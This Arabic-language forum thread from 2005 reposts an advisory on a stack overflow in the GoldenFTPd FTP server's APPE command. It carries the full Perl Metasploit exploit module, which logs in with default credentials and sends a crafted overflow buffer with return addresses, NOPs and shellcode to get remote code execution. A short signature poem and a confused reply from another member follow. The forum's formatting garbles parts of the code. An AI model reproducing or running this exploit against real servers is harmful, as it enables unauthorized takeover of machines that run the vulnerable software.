المنتدى   المدونة   الكلمات الدلالية
                   

تراجع إلى الخلف   منابر المتميز نت > المنابر العلمية والتكنولوجية > منبر الكمبيوتر و الإنترنت وألعاب الكمبيوتر

منبر الكمبيوتر و الإنترنت وألعاب الكمبيوتر مجمع لكل جديد بعالم الحاسب الآلي من برامج و شرحاتها و حلول مشاكلها ، إضافة إلى كل جديد بعالم الإنترنت من مواقع و فيروسات , بالإضافة لكل ما يتعلق بألعاب الكمبيوتر ...

موضوع مغلق
 
LinkBack أدوات الموضوع
  #1 (permalink)  
قديمة 25-12-2005, 04:35 PM
tab
صورة 'الزعـابي' الرمزية
 
تاريخ الإنضمام: Feb 2002
الإقامة: مرتــع الشوق ..
العمر: 28
المشاركات: 4,785
كافة التدوينات: 10
معلومات إضافية
السمعة: 993352
المستوى: الزعـابي has a reputation beyond reputeالزعـابي has a reputation beyond reputeالزعـابي has a reputation beyond reputeالزعـابي has a reputation beyond reputeالزعـابي has a reputation beyond reputeالزعـابي has a reputation beyond reputeالزعـابي has a reputation beyond reputeالزعـابي has a reputation beyond reputeالزعـابي has a reputation beyond reputeالزعـابي has a reputation beyond reputeالزعـابي has a reputation beyond repute
الجنس: male
علم الدولة:
الحالة: الزعـابي غير متصل
المزاج: ???????
الرسالة الشخصية
نداري شرهة الغـالـي ،، ولا نرضى زعــل الأحشــام
افتراضي [EXPL] GoldenFTPd APPE Stack Overflow (Exploit)

"Golden FTP Server is extremely easy to use personal FTP server for Windows and can be run by any person who has the most basic computer skills."

A vulnerability in GoldenFTPd allows remote attackers to cause the product to execute arbitrary by overflowing the APPE FTP command's buffer.



Vulnerable Systems:
* Universal GoldenFTPd version 1.93 and prior

Exploit:
رمز PHP:
## 
# Written by Tim Shelton [redsand@redsand.net] 
# GoldenFTPd 
## 

package Msf::Exploit::goldenftpd_appe
use 
base "Msf::Exploit"
use 
strict
use 
Pex::Text

my $advanced = { }; 

my $info 
  { 
        
'Name' => 'GoldenFTPd APPE <= 1.92 Stack Overflow'
        
'Version' => '$Revision: 1.0 $'
        
'Authors' => [ 'Tim Shelton <redsand [at] redsand.net>', ], 

        
'Arch' => [ 'x86' ], 
        
'OS' => [ 'win32''win2000''winxp''win2003' ], 
        
'Priv' => 0

        
'AutoOpts' => { 'EXITFUNC' => 'thread' }, 
        
'UserOpts' => 
          { 
                
'RHOST' => [1'ADDR''The target address'], 
                
'RPORT' => [1'PORT''The target port'21], 
                
'USER' => [1'DATA''Username''anonymous'], 
                
'PASS' => [1'DATA''Password''metasploit@'], 
          }, 

        
'Payload' => 
          { 
                
'Space' => 400
                
'BadChars' => "\x00\x0a\x0d\x20"
                
'Keys' => ['+ws2ord'], 
          }, 

        
'Description' => Pex::Text::Freeform(qq
                
This module exploits a stack overflow in the GoldenFTPd 
        server
The flaw is triggered when a APPE command is received 
        with a specially crafted overly
-long argumentThis vulnerability 
        affects all versions of GoldenFTPd prior to 1.92 
and was discovered by 
        Tim Shelton

}), 

        
'Refs' => 
          [ 
                [
'RED-NET''2005-11-14-01'], 
          ], 

        
'DefaultTarget' => 0
        
'Targets' => 
          [ 
                [
'GoldenFTPd Server <= 1.92 Universal'0x999988880x111111110x98d855eb0x0044395F], 
          ], 

        
'Keys' => ['goldenftp'], 

        
'DisclosureDate' => 'NONE'
  }; 

sub new { 
        
my $class shift
        
my $self $class->SUPER::new({'Info' => $info'Advanced' => $advanced}, @_); 
        return(
$self); 


sub Exploit 
        
my $self shift
        
my $target_host $self->GetVar('RHOST'); 
        
my $target_port $self->GetVar('RPORT'); 
        
my $target_idx $self->GetVar('TARGET'); 
        
my $shellcode $self->GetVar('EncodedPayload')->Payload
        
my $target $self->Targets->[$target_idx]; 

        if (! 
$self->InitNops(30)) { 
                
$self->PrintLine("[*] Failed to initialize the NOP module."); 
                return; 
        } 

# my $shellcode = "\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe\xeb\xfe"; 


        
my $evil = ("APPE /"); 
        
$evil .= ("A/")x120

        
$evil .= (pack("V",$target->[3])) x 4
        
$evil .= (pack("V",$target->[1]) . pack("V",$target->[2]) . pack("V",$target->[4]) . pack("V"$target->[1]) ) x 4
        
$evil .= $self->MakeNops(30); 
        
$evil .= $shellcode
        
$evil .= "\x0a\x0d"

        
my $s Msf::Socket::Tcp->new 
          

                
'PeerAddr' => $target_host
                
'PeerPort' => $target_port
                
'LocalPort' => $self->GetVar('CPORT'), 
          ); 

        
$self->PrintLine(sprintf ("[*] Universal GoldenFTPd 1.93 Exploit by redsand\n")); 

        if (
$s->IsError) { 
                
$self->PrintLine('[*] Error creating socket: ' $s->GetError); 
                return; 
        } 

        
$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x...."$target->[4])); 

        
my $r $s->Recv(-130); 
        if (! 
$r) { $self->PrintLine("[*] No response from FTP server"); return; } 
        (
$r) = $r =~ m/^([^\n\r]+)(\r|\n)/; 
        
$self->PrintLine("[*] $r"); 

        
$self->PrintLine("[*] Login as " .$self->GetVar('USER'). "/" .$self->GetVar('PASS')); 
        
$s->Send("USER ".$self->GetVar('USER')."\r\n"); 
        
$r $s->Recv(-110); 
        if (! 
$r) { $self->PrintLine("[*] No response from FTP server"); return; } 

        
$s->Send("PASS ".$self->GetVar('PASS')."\r\n"); 
        
$r $s->Recv(-110); 
        if (! 
$r) { $self->PrintLine("[*] No response from FTP server"); return; } 

        
$self->PrintLine("[*] Sending evil buffer...."); 
        
$s->Send($evil); 
        
$r $s->Recv(-110); 
        if (! 
$r) { $self->PrintLine("[*] No response from FTP server"); return; } 
        
$self->Print("[*] $r"); 
        return; 


Additional Information:
The information has been provided by Tim Shelton.

مــن تقـنـع النـفـس قنـعـت لوتعاتبـهـا
ماعـاد تـرجـع كـمـا لاول عـلـى الـعـاده
شـــئٍ بـــلا شـفـهـا مـاعــاد يـطـربـهـا
اذا انـكـفـت مـالـهـا فـــي تـركـهـــا راده
نفسي على ماكرهت ماني بغاصبهــا
ماهي على المخدعه والشين معتاده
بالأرض عايـش وماشـي فـي مناكبهـا
والـحـمـد والـشـكـر للمـعـبـود وزيــــاده
مـاحــد رزقـــه بـيــد غــيــره ويطـلـبـهـا
الـــرزق عـــن الـــذي يـرجـونـه عـبــاده
خــــل الهـضـيـمـه وتـركـهــا لصـاحـبـهـا
لـو كــان عـنـدك بعـيـر ٍ عـاجـز شــداده
مـن تلـدغ اليـد فـي الحـفـره عقاربـهـا
مـاتـردهـا ثـانـيـه والـعـقــرب اســــداده
واختـار م الهجـن سيـر البـعـد يطربـهـا
ماتتـبـع الـظـل يــوم الشـمـس وقــاده
والـــدار مـــن يـــوم تـتـكـدر مشـاربـهـا
مـا للمعيشـه بهـا ذوق ٍ عـلـى الــراده
مـاتـدمـع الـعـيــن إلا لــهــا سبـايـبـهـا
إمــــا وغــــف أو بــهــا عــلــه ونــكــاده

............شعر/ أحمد بن علي الكندي

إذا مرَّ القطار وسمعت جلبة لإحدى عرباته فاعلم أنها فارغة، وإذا سمعت تاجراً يحرّج على بضاعته وينادي عليها فاعلم أنها كاسدة
إن كل فارغ من البشر والأشياء له جلبة وصوت وصراخ، أما العاملون المثابرون فهم في سكون ووقار؛ لأنهم مشغولون ببناء صروح المجد وإقامة هياكل النجاح
قديمة 25-12-2005, 05:23 PM   #2 (permalink)
مريم الطنيجي في ذمة الله

 
tab
صورة 'YeLlOw' الرمزية
 
تاريخ الإنضمام: Oct 2004
المشاركات: 7,524
كافة التدوينات: 15
معلومات إضافية
السمعة: 29840445
المستوى: YeLlOw has a reputation beyond reputeYeLlOw has a reputation beyond reputeYeLlOw has a reputation beyond reputeYeLlOw has a reputation beyond reputeYeLlOw has a reputation beyond reputeYeLlOw has a reputation beyond reputeYeLlOw has a reputation beyond reputeYeLlOw has a reputation beyond reputeYeLlOw has a reputation beyond reputeYeLlOw has a reputation beyond reputeYeLlOw has a reputation beyond repute
الجنس: female
علم الدولة:
الحالة: YeLlOw غير متصل
المزاج: ????
الرسالة الشخصية
Hope U are Happy & doing Well
افتراضي مشاركة: [EXPL] GoldenFTPd APPE Stack Overflow (Exploit)

الصراحة ,,,, الله يعطيك العافية ,,,,

بس شو السالفة

إلي فهمته بحتفظ فيه لنفسي لأنه ما يفيد ولا أحد طبعا أنا أفهم على كيفي .

شكرا مثل الأطرش في الزفة

{هذي أنا وهذي طباعي وجيت أقدم لك وفاي لا عجب ولا عجيبه .....
اللي مضى روح وفات
 
موضوع مغلق

العلامات المرجعية


الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 
أدوات الموضوع

ضوابط المشاركة
لا يمكنك اضافة مواضيع جديدة
لا يمكنك اضافة مشاركات
لا يمكنك اضافة مرفقات
لا يمكنك تعديل مشاركاتك

رمز [IMG] : متاحة
رمز HTML : معطّلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة



الساعة معتمدة بتوقيت جرينتش +4 . الساعة الآن : 05:40 PM

Powered by vBulletin® Version 3.8.6
.Copyright ©2000 - 2016, Jelsoft Enterprises Ltd
All Rights Reserved© 2001 - 2014, Almotmaiz.net